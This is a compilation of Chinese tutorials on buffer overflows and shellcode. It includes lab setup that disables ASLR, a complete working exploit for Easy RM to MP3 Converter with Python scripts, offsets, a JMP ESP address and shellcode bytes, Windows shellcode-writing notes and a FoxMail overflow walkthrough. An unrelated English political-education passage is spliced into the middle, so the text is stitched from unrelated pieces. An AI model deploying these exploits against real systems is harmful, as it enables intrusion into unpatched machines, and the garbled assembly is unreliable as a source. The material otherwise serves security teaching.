缓冲区溢出及ShellCode编写

缓冲区溢出漏洞实验一、实验描述缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。

这一漏洞可以被恶意用户利用来改变程序的流控制，甚至执行代码的任意片段。

这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭，溢出会引起返回地址被重写。

二、实验准备本次实验为了方便观察汇编语句，我们需要在32位环境下作操作，因此实验之前需要做一些准备。

1、输入命令安装一些用于编译32位C程序的东西：sudo apt-get updatesudo apt-get install lib32z1 libc6-dev-i386sudo apt-get install lib32readline-gplv2-dev2、输入命令“linux32”进入32位linux环境。

此时你会发现，命令行用起来没那么爽了，比如不能tab补全了，所以输入“/bin/bash”使用bash：三、实验步骤3.1 初始设置Ubuntu和其他一些Linux系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。

因此本次实验中，我们使用以下命令关闭这一功能：sudo sysctl -w kernel.randomize_va_space=0此外，为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击，许多shell程序在被调用时自动放弃它们的特权。

因此，即使你能欺骗一个Set-UID程序调用一个shell，也不能在这个shell中保持root权限，这个防护措施在/bin/bash中实现。

linux系统中，/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。

为了重现这一防护措施被实现之前的情形，我们使用另一个shell程序（zsh）代替/bin/bash。

下面的指令描述了如何设置zsh程序：sudo sucd /binrm shln -s zsh shexit3.2 shellcode一般情况下，缓冲区溢出会造成程序崩溃，在程序中，溢出的数据覆盖了返回地址。

缓冲区溢出详解缓冲区溢出（Buffer Overflow）是计算机安全领域内既经典⽽⼜古⽼的话题。

随着计算机系统安全性的加强，传统的缓冲区溢出攻击⽅式可能变得不再奏效，相应的介绍缓冲区溢出原理的资料也变得“⼤众化”起来。

其中看雪的《0day安全：软件漏洞分析技术》⼀书将缓冲区溢出攻击的原理阐述得简洁明了。

本⽂参考该书对缓冲区溢出原理的讲解，并结合实际的代码实例进⾏验证。

不过即便如此，完成⼀个简单的溢出代码也需要解决很多书中⽆法涉及的问题，尤其是⾯对较新的具有安全特性的编译器——⽐如MS的Visual Studio2010。

接下来，我们结合具体代码，按照对缓冲区溢出原理的循序渐进地理解⽅式去挖掘缓冲区溢出背后的底层机制。

⼀、代码 <=> 数据顾名思义，缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据，就像往杯⼦⾥倒⼊了过量的⽔⼀样。

通常情况下，缓冲区溢出的数据只会破坏程序数据，造成意外终⽌。

但是如果有⼈精⼼构造溢出数据的内容，那么就有可能获得系统的控制权！如果说⽤户（也可能是⿊客）提供了⽔——缓冲区溢出攻击的数据，那么系统提供了溢出的容器——缓冲区。

缓冲区在系统中的表现形式是多样的，⾼级语⾔定义的变量、数组、结构体等在运⾏时可以说都是保存在缓冲区内的，因此所谓缓冲区可以更抽象地理解为⼀段可读写的内存区域，缓冲区攻击的最终⽬的就是希望系统能执⾏这块可读写内存中已经被蓄意设定好的恶意代码。

按照冯·诺依曼存储程序原理，程序代码是作为⼆进制数据存储在内存的，同样程序的数据也在内存中，因此直接从内存的⼆进制形式上是⽆法区分哪些是数据哪些是代码的，这也为缓冲区溢出攻击提供了可能。

图1 进程地址空间分布图1是进程地址空间分布的简单表⽰。

代码存储了⽤户程序的所有可执⾏代码，在程序正常执⾏的情况下，程序计数器（PC指针）只会在代码段和操作系统地址空间（内核态）内寻址。

数据段内存储了⽤户程序的全局变量，⽂字池等。

EasyRMtoMP3Converter.m3u格式转换之缓冲区溢出0x00.POC实践环境及⼯具1. VMware + WinXP_SP3_EN2. Immunity Debugger 1.853. Vulnerable App获取:0x02.溢出攻击简介 Easy RM to MP3 Converter 2.7.3.700版本在对.m3u格式⽂件进⾏转换时⽂件内容加载时未对对应缓冲区⼤⼩进⾏检查，可导致栈溢出攻击0x03.漏洞Fuzzer Crash_Fuzzer.py1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 f = open('crash_py.m3u','w')4 f.write("\x41"*10000)5 f.close()6print"Crash File m3u Create Successful.. \n" 执⾏脚本⽣成crash_py.m3u⽂件，Easy RM to MP3 Converter载⼊，修改”\x41”的数量10000~20000~30000字节，25000～30000字节之间执⾏后程序直接报错0x04.构造Exploit1. 定位EIP的相对偏移⼤⼩: 使⽤metasploit-framework附带⼩⼯具pettarn_creat.rb⽣成测试字符串ruby pattern_create.rb -l 5000 > C:\pattern.txtStreip = (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9A 替换Fuzzer中的Buffer Crash_Find_EIP.py1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 f = open('crash_py.m3u','w')4 f.write("\x41"*25000 + (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae35 f.close()6print"Crash File m3u Create Successful.. \n" 执⾏脚本 返回错误EIP地址： 356a4234 接下来使⽤pattern_offset.rb定位出错EIP偏移位置ruby pattern_offset.rb -q 356a4234 -l 5000 计算出偏移地址1064字节 EIP位置位于m3u⽂件偏移25000 + 1064 = 26064字节处 2.确定“JMP ESP”的地址 选取C:\WINDOWS\system32\SHELL32.dll⽂件中的⼀条”JMP ESP”指令的地址值 可以发现有相当多的地址可选，这⾥我们随便选取第⼀条：7c9d30d7. 3.剔除坏字符: 构造.m3u⽂件,将需要存放ShellCode的位置放⼊\x00~\Xff字符串（先去掉\x00）1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d756#BadChar: \x00,7 CharCheck = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"8"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"9"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"10"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"11"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"12"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"13"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"14"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")15 #Bad Characters Check1617 data = junk + eipaddr + CharCheck1819 f = open('crash_py.m3u','w')20 f.write(data)21 f.close()22print"Crash File m3u Create Successful.. \n" 运⾏⽣成m3u⽂件，重载程序，在7c9d30d7处下断点，执⾏⾄该处断下 查看当前[ESP-8]处的内存区 发现坏字符\x09，循环以往，共剔除坏字符”\x00,\x01,\x09,\x0a” 4.构造ShellCode： 这⾥我们直接选⽤⽹上⼀段不含以上坏字符的弹出计算器的ShellCode：1 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"2"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"3"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"4"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"5"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"6"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"7"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"8"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"9"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"10"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"11"\x7f\xe8\x7b\xca")0x04.编写Exploit：1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d75 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"6"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"7"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"8"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"9"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"10"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"11"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"12"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"13"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"14"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"15"\x7f\xe8\x7b\xca")1617 data = junk + eipaddr + shellcode1819 f = open('crash_py.m3u','w')20 f.write(data)21 f.close()22print"Crash File m3u Create Successful.. \n"0x05.攻击测试 重新⽣成m3u⽂件，Windbg重载的Easy RM to MP3 Converter，再次在7c9d30d7处下断点，执⾏⾄该处断下10:000> dd /c 5 000ffd302 000ffd30 7c9d30d7 c931c0db 70167cbf 2474d9cc 581eb1f43 000ffd44 83187831 7803fce8 3085f468 c965bc78 f523b6784 000ffd58 7daeb4f3 323aaa02 ed62bf1c 66d5541d 96e721295 000ffd6c ca71f560 14f53506 1bfb7cc7 27f06b05 22fd48dd6 000ffd80 e8a21b38 7a3bf7c3 234f4ccf 57a453d3 833bd8f77 000ffd94 571f838e a1516453 c6f5cd33 987ec1f5 05f1aaf58 000ffda8 3d9926a8 fed9c03b F10单步执⾏⼀次10:000> p2 eax=00000001 ebx=00104a58 ecx=7c91003d edx=00ce0000 esi=77c5fce0 edi=000066643 eip=000ffd38 esp=000ffd38 ebp=00104678 iopl=0 nv up ei pl nz ac pe nc4 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=000002165 000ffd38 bf7c1670cc mov edi,0CC70167Ch 查看此时ESP堆栈10:000> dd /c 5 000ffd382 000ffd38 70167cbf 2474d9cc 581eb1f4 83187831 7803fce83 000ffd4c 3085f468 c965bc78 f523b678 7daeb4f3 323aaa024 000ffd60 ed62bf1c 66d5541d 96e72129 ca71f560 14f535065 000ffd74 1bfb7cc7 27f06b05 22fd48dd e8a21b38 7a3bf7c36 000ffd88 234f4ccf 57a453d3 833bd8f7 571f838e a15164537 000ffd9c c6f5cd33 987ec1f5 05f1aaf5 3d9926a8 fed9c03b8 000ffdb0 0eb66151 8719852f 可以发现此时ShellCode的执⾏跳过的“c931c0db”⼀段，那么“JMP ESP”后⾯添加4个nop指令 修改Exploit：1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d75 nops = "\x90"*86 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"7"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"8"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"9"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"10"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"11"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"12"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"13"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"14"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"15"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"16"\x7f\xe8\x7b\xca")1718 data = junk + eipaddr + nops + shellcode1920 f = open('crash_py.m3u','w')21 f.write(data)22 f.close()23print"Crash File m3u Create Successful.. \n" 重新⽣成m3u⽂件，重载EasyRMtoMP3Converter 发现nops字节数仍然不够，那么再增加4个\x90 ShellCode成功执⾏0x06.参考资料。

缓冲区溢出（栈溢出）前⾔在现在的⽹络攻击中，缓冲区溢出⽅式的攻击占据了很⼤⼀部分，缓冲区溢出是⼀种⾮常普遍的漏洞，但同时，它也是⾮常危险的⼀种漏洞，轻则导致系统宕机，重则可导致攻击者获取系统权限，进⽽盗取数据，为所欲为。

其实缓冲区攻击说来也简单，请看下⾯⼀段代码：int main(int argc, char *argv[]) {char buffer[8];if(argc > 1) strcpy(buffer, argv[1]);return 0;}当我们在对argv[1]进⾏拷贝操作时，并没对其长度进⾏检查，这时候攻击者便可以通过拷贝⼀个长度⼤于8的字符串来覆盖程序的返回地址，让程序转⽽去执⾏攻击代码，进⽽使得系统被攻击。

本篇主要讲述缓冲区溢出攻击的基本原理，我会从程序是如何利⽤栈这种数据结构来进⾏运⾏的开始，试着编写⼀个shellcode，然后⽤该shellcode来溢出我们的程序来进⾏说明。

我们所要使⽤的系统环境为x86_64 Linux，我们还要⽤到gcc（v7.4.0）、gdb（v8.1.0）等⼯具，另外，我们还需要⼀点汇编语⾔的基础，并且我们使⽤AT&T格式的汇编。

进程在现代的操作系统中，进程是⼀个程序的运⾏实体，当在操作系统中运⾏⼀个程序时，操作系统会为我们的程序创建⼀个进程，并给我们的程序在内存中分配运⾏所需的空间，这些空间被称为进程空间。

进程空间主要有三部分组成：代码段，数据段和栈段。

如下图所⽰：栈栈是⼀种后⼊先出的数据结构，在现代的⼤多数编程语⾔中，都使⽤栈这种数据结构来管理过程之间的调⽤。

那什么⼜是过程之间的调⽤呢，说⽩了，⼀个函数或者⼀个⽅法便是⼀个过程，⽽在函数或⽅法内部调⽤另外的过程和⽅法便是过程间的调⽤。

我们知道，程序的代码是被加载到内存中，然后⼀条条（这⾥指汇编）来执⾏的，⽽且时不时的需要调⽤其他的函数。

当⼀个调⽤过程调⽤⼀个被调⽤过程时，所要执⾏的代码所在的内存地址是不同的，当被调⽤过程执⾏完后，⼜要回到调⽤过程继续执⾏。

Lab1：Buffer OverFlow（上午刚翻译的，用谷歌，有不通顺之处，谅解，时间紧任务重，但大部分应该可以，不影响做实验<有不妥之处请看英文原版>。

本人梅冬，喜欢share,愿共同进步）实验概况重要提示：本课程的实验，包括这个实验，要求你设计一个漏洞，并进行攻击。

这些漏洞和攻击是很现实，你也许可以用它来进行实际的攻击，但你却不应该这样做。

该漏洞设计的唯一目标是教你如何防范他们，而不是如何利用它们来攻击别人 - 攻击计算机系统是非法的，可以让你陷入严重的麻烦。

不要这样做。

在这个实验中，你就会明白缓冲区溢出的代价和明白的攻击怎么发生在现实世界中的应用（比如Web服务器）;实验环境设置下载SEED-Ubuntu12.04，与VirtualBox或VMWare的打开它。

不要做你的裸机上的练习，它可能会咬自己。

注：VM账户ID：root密码：seedubuntuID：种子密码：DEES下载Lab1-code实验需求这里有两种练习：常规练习和挑战的一种。

挑战练习可能不是那么难，但可能会涉及大量代码的黑客。

您需要做的是所有的常规练习。

所有的挑战练习是可选的（但鼓励你尝试一下）。

切入程序当你做完实验，压缩你的解决方案，并提交给学校的信息系统注意：您提交的应包括所有要求在每次锻炼的问题。

A部分：缓冲区溢出校长在这部分实验中，你将学习缓冲区溢出的基本原理，然后你将学习如何使用缓冲区溢出攻击一个简单的漏洞的程序，一些基本定理的意志助理你实现目标。

现在，解压缩lab1-code.zip，浏览我们提供的源代码，并找出文件stack1.c。

在这个文件中有一个简单的C程序，其中有缓冲区溢出漏洞。

您可以使用下面的命令编译这个程序：$ make stack1$ ./stack1注：查看Makefile文件，你应该知道为什么命令make stack1可以编译源文件stack1.c，并注意-g选项，当你使用gdb来调试可执行文件，这将是非常有用的。

carried out "practice line pioneer standard, and post spurs" "members concentrated service months", activities, education guide members always everywhere bearing in mind identity, based job post, active play role. To develop differentiated learning education guide party members in accordance with their own situation, target the problems to, based on the work done. Pay attention to the room and room for grass-roots party organizations, grass-roots party organizations have more autonomy in education, making education more ground, full of vitality, good effect. Finally, highlight the normal long-term. To highlight the characteristics of recurrent education, with long flowing, continuous line of perseverance the perseverance to promote educational efforts to realize the party's ideological and political construction of routine institutionalization. With the party branch as the base unit. Play the role of party branches should be, is the key to educational success. Each branch must take strict education and management responsibility of party members, education based on learning to make specific arrangements, fully mobilize the enthusiasm of party members involved in the education, ensure the Organization in place, measures in place, put in place. To the party organization as the basic form. In the standardized development of learning, make learning more effective efforts, and will adhere to the good party group, organized party, party members and the General Assembly, tell a good party lectures, can drive a good topic about, prevent showy without substance, Sham mules. To implement the education management system for basic support. Democratic mutual evaluation on party members in accordance with the regulations, the real performance criteria and order established, sound carefully dispose of unqualified party members, to further improve the dredge export team, pure self cleaning mechanism. Party leading cadres should adhere to and implement the central group learning system, to which branch of learning exchanges, participation in a dual organization with comrades. Focus on recurrent education, you also need to continue to strengthen the building of grass-roots party organizations. Now, the city also has 88 village party organizations are weak and lax, first Secretary of the village, but conversion requires a process. Recently, the city's party organization focused investigation, check out a total of "lost" members 4,507, "Pocket" members 1037, find there are 640 "lost" party members are not contacted 148 "Pocket" party members and implementation of organizational relationships. Educational management of party members into the Organization, there is a lot of work to do. Weak and lax party continued reorganization as an important task, finish perfect organization, with a good team, Good system. Special highlights of grass-roots party organizations, to be dealt with first in place, further education, reorganization, transformation and educational interaction. In short, through solid and effective work initiativesbroken problem, fill the short Board, so that the majority of party members and fully qualified, comprehensive skills of grass-roots party organizations, grass-roots party level upgrade. Comrades, do a "two" learning education is of great significance, responsibilities, carry significant implications. City levels party and general members cadres, to deep awareness "two learn a do" learning education of importance and need, to height of political consciously and full of political enthusiasm, put "two learn a do" learning education carried out good, for coordination advance "four a full" strategy layout, and achieved "Thirteen-Five" good start, and speed up construction more high ecological vitality happiness of City provides strong powerful guarantee. Two, starting from the revered Constitution respected the party Constitution was XI Jinping, General Secretary to the party's request, 18 six plenary session of the Central Commission for discipline inspection report "five experience" first. Full strictly administering the party, first of all, to exalt the party Constitution, and pipe the whole party, the ruling party of the party Constitution. Revered Constitution reflected in awe. Party a party of ideals and beliefs purpose, summed up the party's fine tradition and style; a clear party members and what can be done and what must be done, what cannot be done. Each Communist Party Constitution to awe and wary eye enhancing the sacred sense of responsibility and mission. Hearts filled with party Constitution, hold the party line, BA obligations unconditionally carry out party members, according to the Constitution of direction towards standards efforts. Respect reflected in the study the party Constitution means. Some party members joined the party Constitution on the shelf, not to learn, some long-term party according to the Constitution of the party's organization, the party is not required to pay membership dues, loose concept, party organizations of the party organization, and turned a blind eye on the tasks assigned by the Organization, were forgotten, forgotten vows performance the party Constitution. Constitution is the fundamental standard of our Communists are slim, the party Constitution to repeatedly learn, practice, thinking, learning and thinking, thinking and row, row, ever-spiraling increase in the learning process. Respect party lines reflected in practice. Two to learn a basic Constitution Party rules, series of speeches, the key to be qualified party members. To be qualified party members, standards are not high, but if he does take a ruler of the party Constitution to "card", truly it is not easy. Carry out study and education, every party must control the party's eight obligations, ask, look for gaps, identify problems, clear direction, work to solve specific problems. Actively practicing in the production life of the eight obligations, to play a vanguard and exemplary role, truly a party banner. "Two" fight to highlight grass-roots party organizationssudo sysctl -w kernel.randomize_va_space=0此外，为了进一步防范缓冲区溢出攻击及其它利用shell 程序的攻击，许多shell 程序在被调用时自动放弃它们的特权。

基于shellcode分析缓冲区溢出攻击一、背景介绍缓冲区溢出攻击是一种常见的软件漏洞利用手段，攻击者利用程序在处理数据时对缓冲区输入的验证不严谨，导致恶意输入的数据溢出到程序的内存空间，从而覆盖程序的关键数据，控制程序的执行流程，甚至执行恶意代码。

Shellcode是缓冲区溢出攻击中常用的一种利用载荷，它可以在成功利用缓冲区溢出漏洞后执行攻击者所写入的恶意代码。

本文将基于shellcode分析缓冲区溢出攻击的原理和实现方法。

二、缓冲区溢出攻击原理1. 缓冲区溢出漏洞缓冲区溢出是指程序处理输入数据时没有进行有效的输入验证，导致输入的数据超出了程序为其分配的内存空间，从而覆盖了程序的关键数据。

这种漏洞在C/C++等低级语言编写的程序中比较常见。

攻击者可以利用这种漏洞来进行恶意代码注入和执行。

2. ShellcodeShellcode是一段用于利用程序漏洞的恶意代码，通常被用于执行特定的攻击操作，如提权、反弹Shell等。

Shellcode通常是以二进制形式存在，可以直接注入到目标程序的内存中，并由程序执行。

3. 执行流程当程序存在缓冲区溢出漏洞时，攻击者可以通过构造特定的恶意输入数据，将Shellcode注入到程序的内存中，然后通过控制程序的执行流程，使其执行Shellcode，从而达到攻击者的目的。

三、基于shellcode的缓冲区溢出攻击实现1. 构造恶意输入数据攻击者需要构造特定的恶意输入数据，包括Shellcode以及用于覆盖程序关键数据的长度和内容。

这些数据应该经过精心构造，以确保能够成功利用程序的缓冲区溢出漏洞。

2. 注入Shellcode一旦攻击者成功构造了恶意输入数据，就可以将Shellcode和覆盖关键数据的内容注入到目标程序的内存中。

这通常需要通过程序的输入接口来实现，这种输入接口包括命令行参数、网络输入等。

四、防范缓冲区溢出攻击缓冲区溢出攻击是一种常见的程序漏洞利用手段，对于程序开发者和系统管理员来说，防范这类攻击非常重要。

Window中的shellcode编写框架（⼊门篇）Shellcode定义 是⼀段可注⼊的指令（opcode），可以在被攻击的程序内运⾏。

特点 短⼩精悍，灵活多变，独⽴存在，⽆需任何⽂件格式的包装，因为shellcode直接操作寄存器和函数，所以opcode必须是16进制形式。

因此也不能⽤⾼级语⾔编写shellcode。

在内存中运⾏，⽆需运⾏在固定的宿主进程上。

Shellcode的利⽤原理 将shellcode注⼊缓冲区，然后欺骗⽬标程序执⾏它。

⽽将shellcode注⼊缓冲区最常⽤的⽅法是利⽤⽬标系统上的缓冲区溢出漏洞。

Shellcode⽣成⽅法编程语⾔编写：汇编语⾔，C语⾔shellcode⽣成器Shellcode编写原则杜绝双引号字符串的直接使⽤ 关闭VS⾃动优化没有使⽤到的变量 ⾃定义函数⼊⼝动态获取函数的地址 GetProAddress 从dll中获取函数的地址 参数1：调⽤dll的句柄，参数2：函数名 Bug：error C2760: 语法错误: 意外的令牌“标识符”，预期的令牌为“类型说明符” 打开项⽬⼯程-> 属性 -> c/c++ --> 语⾔ -> 符合模式修改成否即可如果这样设置将⽆法使⽤c函数。

这个⽐较关键，否则使⽤printf就直接崩溃或者是编译报错 最佳⽅案是：修改平台⼯具集通过获得Kernel32基址来获取GetProcAddres基址避免全局变量的使⽤ 因为vs会将全局变量编译在其他区段中结果就是⼀个绝对的地址不能使⽤static定义变量（变量放到内部函数使⽤）确保已加载使⽤API的动态链接库编写shellcode前的准备修改程序⼊⼝点:链接器-⾼级。

作⽤：去除⾃动⽣成的多余的exe代码关闭缓冲区安全检查，属性->C/C++ ->代码⽣成->安全检查禁⽤设置⼯程兼容window XP :代码⽣成 ->运⾏库选择 debug MTD release MT清除资源:链接器->调试->清单⽂件关闭调试功能如下：属性->常规->平台⼯具集选择xp版本C/C++->代码⽣成->运⾏库选择MT安全检查禁⽤链接器->⾼级->⼊⼝点修改为EntryMain函数动态链接调⽤ 在编写shellcode时，所有⽤到的函数都需要动态调⽤，通过LoadLibrary函数加载动态链接库，GetProAddress获取动态链接库中函数的地址。

Shellcode的原理及编写（基础）展开全文1.shellcode原理Shellcode实际是一段代码（也可以是填充数据），是用来发送到服务器利用特定漏洞的代码，一般可以获取权限。

另外，Shellcode一般是作为数据发送给受攻击服务的。

Shellcode是溢出程序和蠕虫病毒的核心，提到它自然就会和漏洞联想在一起，毕竟Shellcode只对没有打补丁的主机有用武之地。

网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。

漏洞利用中最关键的是Shellcode的编写。

由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode，因此掌握Shellcode编写技术就显得尤为重要。

如下链接是shellcode编写的基础，仅供参考/uid-24917554-id-3506660.html缓冲区溢出的shellcode很多了，这里重现下缓冲区溢出。

[cpp] view plain copy1.int fun(char *shellcode)2.{3.char str[4]="";//这里定义4个字节4.strcpy(str,shellcode);//这两个shellcode如果超过4个字节，就会导致缓冲区溢出5.printf("%s",str);6.return 1;7.}8.int main(int argc, char* argv[])9.{10.char str[]="aaaaaaaaaaaaaaaaaaa!";11.fun(str);12.return 0;13.}如上程序，会导致缓冲区溢出。

程序运行后截图如下如上可以看出来，异常偏移是61616161，其实自己观察61616161其实就是aaaa的Hex编码因为调用函数的过程大致是1：将参数从右到左压入堆栈2：将下一条指令的地址压入堆栈3：函数内部的临时变量申请4：函数调用完成，退出内存栈区从高到低[参数][ebp][返回地址][函数内部变量空间]如上程序，如果函数内部变量空间比较小，执行strcpy时候，源字符串比目标字符串长，就会覆盖函数返回地址，导致程序流程变化如图0048FE44前四个00是str申请的四个字节的并初始化为00，后面的48FF1800是函数的返回地址，再后面的411E4000是ebp，既调用函数的基址。

FoxMail的漏洞漏洞分析从上图可以看出，有问题的的版本是FoxMail5.0。

漏洞公告还会给出大概的问题分析。

上图就说到了，有问题的东东是punylib.dll。

安装了FoxMail后，我们可以在安装目录的3rdParty子目录下发现它。

如下图。

从漏洞公告和分析中，我们可以知道，是FoxMail在处理From:字段时允许的长度(0x200)超过了缓冲区分配的长度，从而导致了缓冲区溢出。

但如何写该缓冲区溢出漏洞的利用程序呢？1.有问题程序返回点的精确位置――我们可以把它覆盖成任意地址。

2.ShellCode――一个提供给我们想要的功能的代码。

3.JMP ESP的地址――把返回点覆盖JMP ESP的地址，这样可跳入ShellCode。

定位溢出点从漏洞公告和漏洞分析中我们可以知道，邮件的‘From:’字段太长就会覆盖到返回地址，那我们就写一个初步的溢出程序框架FoxMail1.c，来逐步定位返回点的位置。

这个程序很简单，就是往邮箱发一封信，而且只有‘From:’字段。

在程序的FoxMail1.c中，我们对‘From:’字段进行填充。

我们先填充0x150个A试试。

★memset (buffer, 0x41, 0x150);sprintf (temp, "From: %s\r\n", buffer);send (sock, temp, strlen (temp), 0);★然后执行程序，发送成功！如下图所示。

然后我们用FoxMail接收邮件，如下图。

我们覆盖了0x150个A，可能不仅覆盖过了EIP的地方，而且还覆盖了其他一些程序要用的参量，如果在程序返回前，要对那些参量改写，但参量的地址被改成‘41414141’，是根本不能写的，所以就造成了写（write）类型错误！我们把‘From:’字段覆盖短一点，要覆盖到返回地址，但不要覆盖到那些参量地址。

这里我们采用二分法：即先前0x150太长，就改成0x75，如果0x75太短，不能覆盖返回地址没有报错，那又改长一点，改成0x115的长度，以此类推。

基于shellcode分析缓冲区溢出攻击缓冲区溢出攻击是指通过向程序输入过长的数据，从而导致程序缓冲区溢出，覆盖了程序的内存空间，进而破坏程序的执行流程，达到攻击者的恶意目的。

缓冲区溢出攻击是一种常见、危害巨大的安全漏洞，被广泛应用于各种攻击实验和黑客攻击现场。

当程序执行过程中遇到缓冲区溢出时，可能会发生几种情况：1、程序可以正常地结束，但是存在安全漏洞；2、程序会崩溃，因为缓冲区溢出导致了“未知原因”的错误；3、程序会被攻击者完全控制，攻击者可以篡改程序的内存，执行任意代码，甚至完全掌控被攻击机器。

因此，缓冲区溢出攻击是一种非常严重的安全威胁，需要引起重视。

